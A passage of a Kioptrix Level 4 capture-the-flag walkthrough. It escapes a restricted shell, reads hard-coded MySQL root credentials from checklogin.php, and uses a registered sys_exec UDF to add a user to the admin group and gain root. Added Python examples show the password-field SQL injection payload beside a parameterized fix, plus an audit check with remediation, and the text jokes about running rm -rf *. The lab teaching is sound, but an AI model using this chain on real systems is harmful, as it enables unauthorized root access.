    3.2.2 Shell escape

    Xshell 7 (Build 0063)
    Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.
    Type `help' to learn how to use Xshell prompt.
    [C:\~]$ ssh john@
    Connecting to
    Connection established.
    To escape to local shell, press 'Ctrl+Alt+]'.
    WARNING! The remote SSH server rejected X11 forwarding request.
    Welcome to LigGoat Security Systems - We are Watching
    == Welcome LigGoat Employee ==
    LigGoat Shell is in place so you  don't screw up
    Type '?' or 'help' to get the list of allowed commands
    john:~$ echo os.system('/bin/bash')


    3.3 MySQL UDF privilege escalation

    3.3.1 Checking running services

    john@Kioptrix4:~$ ps -ef
    UID        PID  PPID  C STIME TTY          TIME CMD
    root         1     0  0 16:22 ?        00:00:03 /sbin/init
    root         2     0  0 16:22 ?        00:00:00 [kthreadd]
    root         3     2  0 16:22 ?        00:00:00 [migration/0]
    root         4     2  0 16:22 ?        00:00:00 [ksoftirqd/0]
    root         5     2  0 16:22 ?        00:00:00 [watchdog/0]
    root         6     2  0 16:22 ?        00:00:00 [migration/1]
    root         7     2  0 16:22 ?        00:00:00 [ksoftirqd/1]
    root         8     2  0 16:22 ?        00:00:00 [watchdog/1]
    root         9     2  0 16:22 ?        00:00:00 [events/0]
    root        10     2  0 16:22 ?        00:00:00 [events/1]
    root        11     2  0 16:22 ?        00:00:00 [khelper]
    root        46     2  0 16:22 ?        00:00:00 [kblockd/0]
    root        47     2  0 16:22 ?        00:00:00 [kblockd/1]
    root        50     2  0 16:22 ?        00:00:00 [kacpid]
    root        51     2  0 16:22 ?        00:00:00 [kacpi_notify]
    root       247     2  0 16:22 ?        00:00:00 [kseriod]
    root       291     2  0 16:22 ?        00:00:00 [pdflush]
    root       292     2  0 16:22 ?        00:00:00 [pdflush]
    root       293     2  0 16:22 ?        00:00:00 [kswapd0]
    root       335     2  0 16:22 ?        00:00:00 [aio/0]
    root       336     2  0 16:22 ?        00:00:00 [aio/1]
    root      1742     2  0 16:22 ?        00:00:00 [ksuspend_usbd]
    root      1746     2  0 16:22 ?        00:00:00 [khubd]
    root      2180     2  0 16:22 ?        00:00:00 [ata/0]
    root      2181     2  0 16:22 ?        00:00:00 [ata/1]
    root      2185     2  0 16:22 ?        00:00:00 [ata_aux]
    root      2629     2  0 16:22 ?        00:00:00 [scsi_eh_0]
    root      2657     2  0 16:22 ?        00:00:00 [scsi_eh_1]
    root      2658     2  0 16:22 ?        00:00:00 [scsi_eh_2]
    root      2659     2  0 16:22 ?        00:00:00 [scsi_eh_3]
    root      2660     2  0 16:22 ?        00:00:00 [scsi_eh_4]
    root      2661     2  0 16:22 ?        00:00:00 [scsi_eh_5]
    root      2662     2  0 16:22 ?        00:00:00 [scsi_eh_6]
    root      2663     2  0 16:22 ?        00:00:00 [scsi_eh_7]
    root      2664     2  0 16:22 ?        00:00:00 [scsi_eh_8]
    root      2665     2  0 16:22 ?        00:00:00 [scsi_eh_9]
    root      2666     2  0 16:22 ?        00:00:00 [scsi_eh_10]
    root      2667     2  0 16:22 ?        00:00:00 [scsi_eh_11]
    root      2668     2  0 16:22 ?        00:00:00 [scsi_eh_12]
    root      2669     2  0 16:22 ?        00:00:00 [scsi_eh_13]
    root      2670     2  0 16:22 ?        00:00:00 [scsi_eh_14]
    root      2671     2  0 16:22 ?        00:00:00 [scsi_eh_15]
    root      2672     2  0 16:22 ?        00:00:00 [scsi_eh_16]
    root      2673     2  0 16:22 ?        00:00:00 [scsi_eh_17]
    root      2674     2  0 16:22 ?        00:00:00 [scsi_eh_18]
    root      2675     2  0 16:22 ?        00:00:00 [scsi_eh_19]
    root      2676     2  0 16:22 ?        00:00:00 [scsi_eh_20]
    root      2677     2  0 16:22 ?        00:00:00 [scsi_eh_21]
    root      2678     2  0 16:22 ?        00:00:00 [scsi_eh_22]
    root      2679     2  0 16:22 ?        00:00:00 [scsi_eh_23]
    root      2680     2  0 16:22 ?        00:00:00 [scsi_eh_24]
    root      2681     2  0 16:22 ?        00:00:00 [scsi_eh_25]
    root      2682     2  0 16:22 ?        00:00:00 [scsi_eh_26]
    root      2683     2  0 16:22 ?        00:00:00 [scsi_eh_27]
    root      2684     2  0 16:22 ?        00:00:00 [scsi_eh_28]
    root      2685     2  0 16:22 ?        00:00:00 [scsi_eh_29]
    root      2686     2  0 16:22 ?        00:00:00 [scsi_eh_30]
    root      2990     2  0 16:22 ?        00:00:00 [scsi_eh_31]
    root      2992     2  0 16:22 ?        00:00:00 [scsi_eh_32]
    root      3287     2  0 16:22 ?        00:00:00 [kjournald]
    root      3458     1  0 16:22 ?        00:00:00 /sbin/udevd --daemon
    root      3805     2  0 16:22 ?        00:00:00 [kgameportd]
    root      4103     2  0 16:22 ?        00:00:00 [kpsmoused]
    root      5400     1  0 16:22 tty4     00:00:00 /sbin/getty 38400 tty4
    root      5401     1  0 16:22 tty5     00:00:00 /sbin/getty 38400 tty5
    root      5408     1  0 16:22 tty2     00:00:00 /sbin/getty 38400 tty2
    root      5410     1  0 16:22 tty3     00:00:00 /sbin/getty 38400 tty3
    root      5413     1  0 16:22 tty6     00:00:00 /sbin/getty 38400 tty6
    syslog    5449     1  0 16:22 ?        00:00:00 /sbin/syslogd -u syslog
    root      5468     1  0 16:22 ?        00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
    klog      5470     1  0 16:22 ?        00:00:00 /sbin/klogd -P /var/run/klogd/kmsg
    root      5489     1  0 16:22 ?        00:00:00 /usr/sbin/sshd
    root      5545     1  0 16:22 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
    root      5587  5545  0 16:22 ?        00:00:04 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
    root      5588  5545  0 16:22 ?        00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
    root      5662     1  0 16:22 ?        00:00:00 /usr/sbin/nmbd -D
    root      5664     1  0 16:22 ?        00:00:00 /usr/sbin/smbd -D
    root      5678  5664  0 16:22 ?        00:00:00 /usr/sbin/smbd -D
    root      5679     1  0 16:22 ?        00:00:00 /usr/sbin/winbindd
    root      5683  5679  0 16:22 ?        00:00:00 /usr/sbin/winbindd
    daemon    5700     1  0 16:22 ?        00:00:00 /usr/sbin/atd
    root      5711     1  0 16:22 ?        00:00:00 /usr/sbin/cron
    root      5733     1  0 16:22 ?        00:00:00 /usr/sbin/apache2 -k start
    dhcp      5783     1  0 16:22 ?        00:00:00 dhclient eth1
    root      5790     1  0 16:22 tty1     00:00:00 /sbin/getty 38400 tty1
    root      5806  5679  0 16:34 ?        00:00:00 /usr/sbin/winbindd
    root      5807  5679  0 16:34 ?        00:00:00 /usr/sbin/winbindd
    www-data  6714  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    www-data  6715  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    www-data  6716  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    www-data  6717  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    www-data  6718  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    www-data  6719  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    www-data  6720  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
    root      6729  5489  0 17:58 ?        00:00:00 sshd: john [priv]
    john      6731  6729  0 17:58 ?        00:00:00 sshd: john@pts/0 
    john      6732  6731  0 17:58 pts/0    00:00:00 python /bin/kshell
    john      6733  6732  0 18:02 pts/0    00:00:00 sh -c /bin/bash
    john      6734  6733  0 18:02 pts/0    00:00:00 /bin/bash
    john      6753  6734  0 18:05 pts/0    00:00:00 ps -ef

    This confirms that mysqld runs as root: the process owner is root and it was started explicitly with `--user=root`, so anything MySQL can be made to execute on the OS runs as root too. We will therefore try to escalate privileges through MySQL.

    3.3.2 Locating PHP files

    john@Kioptrix4:~$ find /var/www -name '*.php'

    3.3.3 Reading the PHP file

    john@Kioptrix4:~$ cat /var/www/checklogin.php
    $host="localhost"; // Host name
    $username="root"; // Mysql username
    $password=""; // Mysql password
    $db_name="members"; // Database name
    $tbl_name="members"; // Table name
    // Connect to server and select database.
    mysql_connect("$host", "$username", "$password")or die("cannot connect");
    mysql_select_db("$db_name")or die("cannot select DB");
    // Define $myusername and $mypassword
    // To protect MySQL injection (more detail about MySQL injection)
    $myusername = stripslashes($myusername);
    //$mypassword = stripslashes($mypassword);
    $myusername = mysql_real_escape_string($myusername);
    //$mypassword = mysql_real_escape_string($mypassword);
    //$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
    $result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
    // Mysql_num_row is counting table row
    // If result matched $myusername and $mypassword, table row must be 1 row
    // Register $myusername, $mypassword and redirect to file "login_success.php"
    else {
    echo "Wrong Username or Password";
    ); } ob_end_flush(); ?>

    Two things in this file matter for what follows. First, `$myusername` is passed through `stripslashes()` and `mysql_real_escape_string()`, but the equivalent lines for `$mypassword` are commented out, so the password field is concatenated raw into the query: that is the SQL injection used to get in. Second, the application connects to MySQL as `root` with an empty password, and since the file is readable to john, those credentials are our way into the database server.
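    The defect in checklogin.php shown side by side with its fix. This is an added example written for this page, not code from the walkthrough or from the Kioptrix VM; it is in Python with an in-memory SQLite table standing in for the MySQL `members` table, because the bug is in how the query string is assembled, not in the database engine. The `escape_username()` helper and the sample credential `s3cret-sample` are constructed for the example.

```python
import sqlite3

# Constructed sample row standing in for the Kioptrix `members` table.
SAMPLE_MEMBERS = [("john", "s3cret-sample")]


def make_db():
    """In-memory stand-in for the `members` database used by checklogin.php."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (username TEXT, password TEXT)")
    con.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_MEMBERS)
    return con


def escape_username(value):
    """Plays the role of mysql_real_escape_string() for the username.

    SQLite escapes a quote inside a string literal by doubling it, so that
    is what we do here (MySQL would additionally accept backslash escapes).
    """
    return value.replace("'", "''")


def login_vulnerable(con, username, password):
    """checklogin.php as it ships: username escaped, password not.

    The password is pasted into the SQL text unchanged, so a value such as
    ' or '1'='1  closes the literal and appends an always-true condition.
    """
    sql = ("SELECT * FROM members WHERE username='%s' and password='%s'"
           % (escape_username(username), password))
    return con.execute(sql).fetchone() is not None


def login_fixed(con, username, password):
    """The same check with placeholders.

    The driver sends the statement and the two values separately, so nothing
    in either value can change the statement's structure. In the PHP original
    the equivalent is a mysqli/PDO prepared statement with bind_param /
    bindValue; a complete fix would also compare a password_hash() digest
    instead of a plaintext password column.
    """
    row = con.execute(
        "SELECT 1 FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    con = make_db()
    payload = "' or '1'='1"
    print("vulnerable, real creds :", login_vulnerable(con, "john", "s3cret-sample"))
    print("vulnerable, injection  :", login_vulnerable(con, "nobody", payload))
    print("fixed, injection       :", login_fixed(con, "nobody", payload))
    print("fixed, real creds      :", login_fixed(con, "john", "s3cret-sample"))
```

    Note that escaping the username does work on its own: the same payload placed in the username field is rejected by both functions. The bypass exists only because one of the two inputs reaches the query unescaped, which is why the fix is to stop building SQL from strings altogether rather than to escape more carefully.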


    3.3.4 Logging into the MySQL database

    checklogin.php gave us the credentials: user root with an empty password, so we simply press Enter at the password prompt.

    john@Kioptrix4:~$ mysql -u root -p
    Enter password: 
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 6258
    Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
    Type 'help;' or '\h' for help. Type '\c' to clear the buffer.


    3.3.5 Checking the UDF table

    `mysql.func` lists the user-defined functions already registered with the server. Two are present, both from lib_mysqludf_sys, and `sys_exec()` runs an arbitrary OS command with the privileges of the mysqld process, which we have just seen is root. Nothing has to be uploaded or compiled; the UDF is already installed.

    mysql> SELECT * FROM mysql.func;
    | name                  | ret | dl                  | type     |
    | lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function | 
    | sys_exec              |   0 | lib_mysqludf_sys.so | function | 
    2 rows in set (0.00 sec)


    3.3.6 Adding the user to the admin group

    Use `sys_exec()` to add john to the `admin` group. On this Ubuntu release the default sudoers grants members of `admin` full sudo (`%admin ALL=(ALL) ALL`), so john can then sudo with his own password.

    mysql> select sys_exec('usermod -a -G admin john '); 
    | sys_exec('usermod -a -G admin john ') |
    | NULL                                  | 
    1 row in set (0.04 sec)
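    A check that ties together the two preconditions this chain relies on: the owner of the mysqld process (3.3.1) and the command-execution UDFs registered in `mysql.func` (3.3.5). This is an added example for this page, not part of the walkthrough. Its inputs are constructed: a `ps -ef` sample abbreviated from the listing above, the two `mysql.func` rows, and a hardened counterpart for comparison. The `sys_eval` entry in `COMMAND_UDFS` is the other command-running function shipped in lib_mysqludf_sys; it is not registered on this box and is included as an assumption about what an auditor would also look for.

```python
import re

# Constructed sample: ps -ef cut down to the lines that matter, modelled on
# the walkthrough's listing.
SAMPLE_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root      5545     1  0 16:22 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      5587  5545  0 16:22 ?        00:00:04 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
www-data  6714  5733  0 17:21 ?        00:00:00 /usr/sbin/apache2 -k start
john      6732  6731  0 17:58 pts/0    00:00:00 python /bin/kshell
"""

# Constructed counterpart: the same host after remediation (mysqld dropped
# to the mysql account).
HARDENED_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
mysql     5587  5545  0 16:22 ?        00:00:04 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --port=3306
"""

# (name, ret, dl, type) as returned by SELECT * FROM mysql.func on the target.
SAMPLE_FUNC_ROWS = [
    ("lib_mysqludf_sys_info", 0, "lib_mysqludf_sys.so", "function"),
    ("sys_exec", 0, "lib_mysqludf_sys.so", "function"),
]

# lib_mysqludf_sys functions that execute an OS command. sys_eval is an
# assumption about what else to look for; it is not registered on this box.
COMMAND_UDFS = {"sys_exec", "sys_eval"}


def parse_ps(ps_text):
    """Yield (uid, cmd) for each process line of `ps -ef` output."""
    for line in ps_text.splitlines()[1:]:      # skip the header row
        parts = line.split(None, 7)            # UID PID PPID C STIME TTY TIME CMD
        if len(parts) == 8:
            yield parts[0], parts[7]


def mysqld_process(ps_text):
    """Return (owner, command line) of the mysqld server, or None.

    Matches the server binary itself, not the mysqld_safe wrapper script.
    """
    for uid, cmd in parse_ps(ps_text):
        if re.search(r"(^|/)mysqld(\s|$)", cmd):
            return uid, cmd
    return None


def command_udfs(func_rows):
    """Names of registered UDFs that execute OS commands, sorted."""
    return sorted({name for name, _ret, _dl, kind in func_rows
                   if kind == "function" and name in COMMAND_UDFS})


def audit(ps_text, func_rows):
    """List the privilege-escalation preconditions present on the host."""
    findings = []
    proc = mysqld_process(ps_text)
    runs_as_root = proc is not None and proc[0] == "root"
    if runs_as_root:
        msg = "mysqld runs as root"
        if "--user=root" in proc[1]:
            msg += " (started explicitly with --user=root)"
        findings.append(msg)
    udfs = command_udfs(func_rows)
    if udfs:
        findings.append("command-execution UDF registered: " + ", ".join(udfs))
    if runs_as_root and udfs:
        findings.append("chain complete: SELECT %s('...') runs as root" % udfs[0])
    return findings


if __name__ == "__main__":
    for label, ps, rows in (("target", SAMPLE_PS, SAMPLE_FUNC_ROWS),
                            ("hardened", HARDENED_PS, [])):
        print(label, "->", audit(ps, rows) or ["nothing found"])
```

    Either finding on its own is worth fixing: a root mysqld turns any future file-write or UDF primitive into root, and a command-execution UDF turns any database credential into code execution as the server account. On the target the remediation is `user = mysql` under `[mysqld]` in my.cnf, `DROP FUNCTION sys_exec;` (and the `_info` function) followed by removing the shared object from the plugin directory, and giving the web application its own low-privilege MySQL account instead of `root` with an empty password.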


    3.3.7 Switching to root

    `sys_exec()` returned NULL, which tells us nothing about whether usermod succeeded; the real test is whether sudo now accepts john's password.

    john@Kioptrix4:~$ sudo su
    [sudo] password for john: 
    root@Kioptrix4:/home/john# id
    uid=0(root) gid=0(root) groups=0(root)
    root@Kioptrix4:/home/john# whoami

    At this point we have root. O(∩_∩)O Haha, we could even run rm -rf * now.

    3.3.8 Flag

    root@Kioptrix4:/home/john# cd /root
    root@Kioptrix4:~# ls
    congrats.txt  lshell-0.9.12
    root@Kioptrix4:~# cat congrats.txt
    You've got root.
    There is more than one way to get root on this system. Try and find them.
    I've only tested two (2) methods, but it doesn't mean there aren't more.
    As always there's an easy way, and a not so easy way to pop this box.
    Look for other methods to get root privileges other than running an exploit.
    It took a while to make this. For one it's not as easy as it may look, and
    also work and family life are my priorities. Hobbies are low on my list.
    Really hope you enjoyed this one.
    If you haven't already, check out the other VMs available on:
    Thanks for playing,



    This Kioptrix Level #4 walkthrough covered host discovery (nmap/netdiscover), port scanning (nmap/masscan), directory scanning (dirb/dirsearch), SQL injection, a restricted-shell escape, and privilege escalation through MySQL UDFs:

    • Host discovery
    • Port scanning
    • Directory scanning
    • SQL injection
    • Shell escape
    • UDF privilege escalation


